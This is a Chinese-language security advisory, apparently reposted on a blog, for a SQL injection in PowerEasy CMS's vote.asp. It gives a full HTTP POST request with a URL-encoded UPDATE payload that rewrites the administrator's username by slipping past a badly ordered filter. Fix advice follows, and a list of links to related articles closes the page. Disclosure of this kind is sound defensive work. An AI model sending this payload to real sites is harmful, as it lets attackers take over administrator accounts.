动易网站管理系统vote.asp页面存在SQL注入漏洞

测试系统:

动易(PowerEasy CMS SP6 071030以下版本)

安全综述:

动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。

漏洞描述:

vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入

但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制。但是其过滤的顺序不对。有导致mssql的注释符号--可以进入语句

测试方法:

POST Vote.asp HTTP/1.1

Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/x-shockwave-flash, */*

Referer: http://127.0.0.1/Vote.asp?ID=2&Action=Show

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host: 127.0.0.1

Content-Length: 160

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http%3A%2F%2Fkw%2Elyedu%2Ecom%2Ecn=lao=8; style=null; chkRemember=false; ASPSESSIONID×××CABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1

VoteOption=1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D&VoteType=Multi&Action=Vote&ID=2

其中 1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D解码后为

1=1+update PE_Admin set adminname=0x61-;-

他们先过滤了--再过滤; 导致以-;-的形式可以很轻松的把注释符带入语句,执行语句后,成功把管理员的用户名设置为a

解决方案:

更新动易组件(需要管理员的权限才能更新)。

不需要投票功能的用户,删除此文件。

有需要,但是又没有权限更新动易组件(需要管理员的权限才能更新)的用户。请在vote.asp文件自行过滤各个参数。

动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞相关推荐

  1. 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

    漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...

  2. thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...

  3. 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...

    作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...

  4. 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  5. 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  6. 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  7. 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  8. 迅雷某页面存在sql注入漏洞

    漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  9. SQL注入漏洞的检测与防范技术

    提 要   本文从SQL注入的基本概念和注入原理入手,分析总结了SQL注入漏洞的检测及其防范技术措施. 关键词  SQL注入漏洞 检测 防范技术 引 言    近几年来随着计算机网络和WEB技术的飞速 ...

最新文章

  1. etcd 笔记(01)— etcd 简介、特点、应用场景、常用术语、分布式 CAP 理论、分布式原理
  2. 源文件封装为IP的步骤
  3. 这个冬天,将是共享单车最艰难的时刻
  4. 以太网,IP,TCP,UDP数据包分析【转】
  5. php curl和file get,PHP cURL与file_get_contents
  6. [渝粤教育] 新乡医学院 医学免疫学 参考 资料
  7. php文件上传并保存路径到数据库,thinkphp表单上传文件并将文件路径保存到数据库中?...
  8. PyTorch框架学习十九——模型加载与保存
  9. android物理健代码,Android 物理按键整理及实例代码
  10. PuTTY 远程连接矩池云GPU主机
  11. 再见,Navicat!这个 IDEA 的兄弟,真香!
  12. DotCMS安装步骤
  13. arm linux 内存压力测试,嵌入式中如何给内存做压力测试?
  14. 一杯免费咖啡引发的ERP上云思考
  15. ios QQ下拉列表 UITableViewHeaderFooterView
  16. EDA实验(3)计数器设计
  17. Activiti reassign task to another user
  18. 【C++从青铜到王者】第十八篇:C++之多态
  19. ffmpeg 视频提取音频 php-ffmpeg
  20. 注解的作用 常用注解

热门文章

  1. 现代数据中心标准COTS服务器的演进
  2. [Practical.Vim(2012.9)].Drew.Neil.Tip19学习摘要
  3. 网络游戏服务器架构流程
  4. 东方博宜OJ 1052 - 【入门】行李托运费
  5. 苹果平板做ppt方便吗_有没有苹果手机和安卓平板之间方便复制粘贴的工具啊?...
  6. 计算机微课论文参考文献,微课教学学论文参考文献 微课教学参考文献怎么写...
  7. ubuntu qt平台搭建openssl开发环境
  8. 关于项目管理那档子事儿
  9. codevs 1227 方格取数2
  10. 盘点国产青春电影十宗罪